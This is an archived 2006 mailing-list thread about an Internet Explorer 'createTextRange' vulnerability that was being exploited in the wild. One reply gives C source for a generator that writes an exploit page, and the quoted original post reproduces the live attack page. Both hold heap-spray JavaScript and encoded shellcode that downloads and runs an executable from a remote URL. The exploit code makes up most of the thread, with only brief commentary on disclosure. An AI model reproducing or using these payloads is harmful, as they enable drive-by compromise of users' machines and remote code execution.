OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
RE: [Dailydave] IE attack...

From: Anthony Aykut (anthony.aykutframe4.com)
Date: Sat Mar 25 2006 - 10:50:18 CST


And here is the C code ;)

_Anthony

/*
*
* Internet Explorer "createTextRang" Download Shellcoded Exploit
* Bug discovered by Computer Terrorism (UK)
* http://www.computerterrorism.com/research/ct22-03-2006
* Reliable exploitation by Darkeagle of Unl0ck Research Team
* http://www.milw0rm.com/exploits/1606
*
* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2
* Severity: Critical
* Impact: Remote System Access
* Solution Status: Unpatched
*
* E-Mail: atmacaicqmail.com
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com
* Credit to Kozan,Darkeagle,delikon,Stelian Ene
*
*/

#include <windows.h>
#include <stdio.h>

#define BUF_LEN 0x1518
#define FILE_NAME "index.htm"

char body1[] =
"<input type=\"checkbox\" id=\"blah\">\r\n"
"<SCRIPT language=\"javascript\">\r\n\r\n"
"shellcode = unescape(\r\n"
"\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n"
"\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n"
"\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n"
"\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n"
"\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n"
"\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n"
"\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n"
"\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n"
"\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n"
"\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n"
"\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n"
"\t\"%u0065";

char body2[] =
        "\r\n\r\nbigblock = unescape(\"%u9090%u9090\");\r\n"
        "slackspace = 20 + shellcode.length\r\n\r\n"
        "while (bigblock.length < slackspace)\r\n"
        "\tbigblock += bigblock;\r\n\r\n"
        "fillblock = bigblock.substring(0, slackspace);\r\n\r\n"
        "block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n"
        "while(block.length + slackspace < 0x40000)\r\n"
        "\tblock = block + block + fillblock;\r\n\r\n"
        "memory = new Array();\r\n\r\n"
        "for ( i = 0; i < 2020; i++ )\r\n"
        "\tmemory[i] = block + shellcode;\r\n\r\n"
        "var r = document.getElementById('blah').createTextRange();\r\n\r\n"
        "</script>\r\n";

int main(int argc,char *argv[])
{
        if (argc < 2)
        {
                printf("\nInternet Explorer \"createTextRang\" Download
Shellcoded Exploit");
                printf("\nUsage:\n");
                printf(" ie_exp <WebUrl>\n");

                return 0;
        }

        FILE *File;
        char *pszBuffer;
        char *web = argv[1];
        char *pu = "%u";
        char u_t[5];
        char *utf16 = (char*)malloc(strlen(web)*5);

        if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) {
                printf("\n [Err:] fopen()");
                exit(1);
        }

        pszBuffer = (char*)malloc(BUF_LEN);
        memcpy(pszBuffer,body1,sizeof(body1)-1);

        memset(utf16,'\0',strlen(web)*5);
        for (unsigned int i=0;i<strlen(web);i=i+2)
        {
                sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]);
                strcat(utf16,u_t);
        }

        strcat(pszBuffer,utf16);
        strcat(pszBuffer,"%u0000\");");
        strcat(pszBuffer,body2);

        fwrite(pszBuffer, BUF_LEN, 1,File);
        fclose(File);

        printf("\n\n" FILE_NAME " has been created in the current
directory.\n");
        return 1;
}

-----Original Message-----
From: Dave Aitel [mailto:daveimmunityinc.com]
Sent: 25 March 2006 17:41
To: dailydavelists.immunitysec.com
Subject: [Dailydave] IE attack...

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
So this is the IE attack various sites are owning people with...I stumbled
on it while browsing random things. It's been a pretty bad week for IE this
week. Of course, it's been a pretty bad year for IE.
Been a pretty bad time all around for IE. Motto: "Giving Host Intrusion
Prevention vendors case study after case study."

I don't know why the other lists aren't posting this. Maybe there was a memo
that went around where you try to keep people from knowing what they're
actually at risk from.

- -dave

<input type="checkbox" id="blah">
<SCRIPT language="java script">

shellcode = unescape(
 
"%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6300%u6c61%u2
e63%u7865%u0065%u6f4d%u697a%u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170%u6974%
u6c62%u3b65%u4d20%u4953%u2045%u2e35%u3130%u203b%u6957%u646e%u776f%u2073%u544
e%u3520%u302e%u0029%u6977%u696e%u656e%u2e74%u6c64%u006c%u0000%u0000%u0000%u0
000%u0000%u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465%u704f%u6e65%u0041%u6e49%
u6574%u6e72%u7465%u704f%u6e65%u7255%u416c%u4900%u746e%u7265%u656e%u5274%u616
5%u4664%u6c69%u0065%u6e49%u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61%u6c64%u0
065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%
u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u0000%u0000%u0000%u7468%u7074%u2f3a%u772f%u7777%u662e%u6c75%u666c%
u7461%u6b73%u6e69%u796e%u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000%u0000%u000
0%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0
000%u0000%u6058%ud08b%u33fc%u64c0%u408b%u8b30%u0c40%u708b%uad1c%u688b%u5208%
u5252%u5252%u5252%u5252%u5252%u5252%u79bb%ue741%u5288%u0068%u0002%ue800%u019
1%u0000%u8b5f%u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000%ua4f2%ubb5a%u7959%u4
773%u006a%u8068%u0000%u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852%u0161%u0000%
ue85a%u014b%u0000%u4289%u8304%u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00%uc21
b%u3b10%ue85a%u012f%u0000%u0289%uc283%u5210%ue850%u0133%u0000%u815a%ue8c2%u0
003%u8300%u09c2%u006a%u006a%u006a%u006a%uff52%u5ad0%u08e8%u0001%u8900%u0842%
u028b%u1bbb%u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00%ueee8%u0000%u8b00%u8bd
8%u0842%uc281%u00a8%u0000%u006a%u0068%u0000%u6a80%u6a00%u5200%uff50%u5ad3%uc
ee8%u0000%u8900%u0842%u028b%u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000%u8b00%
u5af0%ub2e8%u0000%u8b00%u087a%uca8b%uc183%u5a0c%u5256%u5151%ue868%u0003%u520
0%uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02%u5a2a%u5251%ue852%u0087%u0000%ud
a8b%uc383%u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056%u4fbb%u6a47%ue807%u007b%
u0000%u595a%ueb5e%u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776%ued00%ue850%u006
1%u0000%ubb5a%u4179%u88e7%u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b%uf803%uc
681%u03e8%u0000%u09b9%u0000%uf200%u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b%
uc783%uc710%u1047%u0044%u0000%u21bb%u05d0%u57d0%u5056%u6a50%u5020%u5050%u525
0%u12e8%u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2%uc283%u8334%u0cc2%u53c3%u5
756%u458b%u8b3c%u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0%u41c9%u348b%u038a%
u33f5%uc1ff%u13cf%u03ac%u85f8%u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd%u0c8
b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5%u5b5e%ue0ff");

    bigblock = unescape("%u9090%u9090");
    slackspace = 20 + shellcode.length

    while (bigblock.length < slackspace)
        bigblock += bigblock;

    fillblock = bigblock.substring(0, slackspace);

    block = bigblock.substring(0, bigblock.length-slackspace);

    while(block.length + slackspace < 0x40000)
        block = block + block + fillblock;

    memory = new Array();

    for ( i = 0; i < 2020; i++ )
        memory[i] = block + shellcode;

    var r = document.getElementById('blah').createTextRange();

</script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
 
iD8DBQFEJXKktehAhL0gheoRApFMAJkBqhCnj2NTvVZ30sJUhhk/2gwkpgCcChNa
CNw1qWJPIKuPDBFaPZDW47U=
=+Vsq
-----END PGP SIGNATURE-----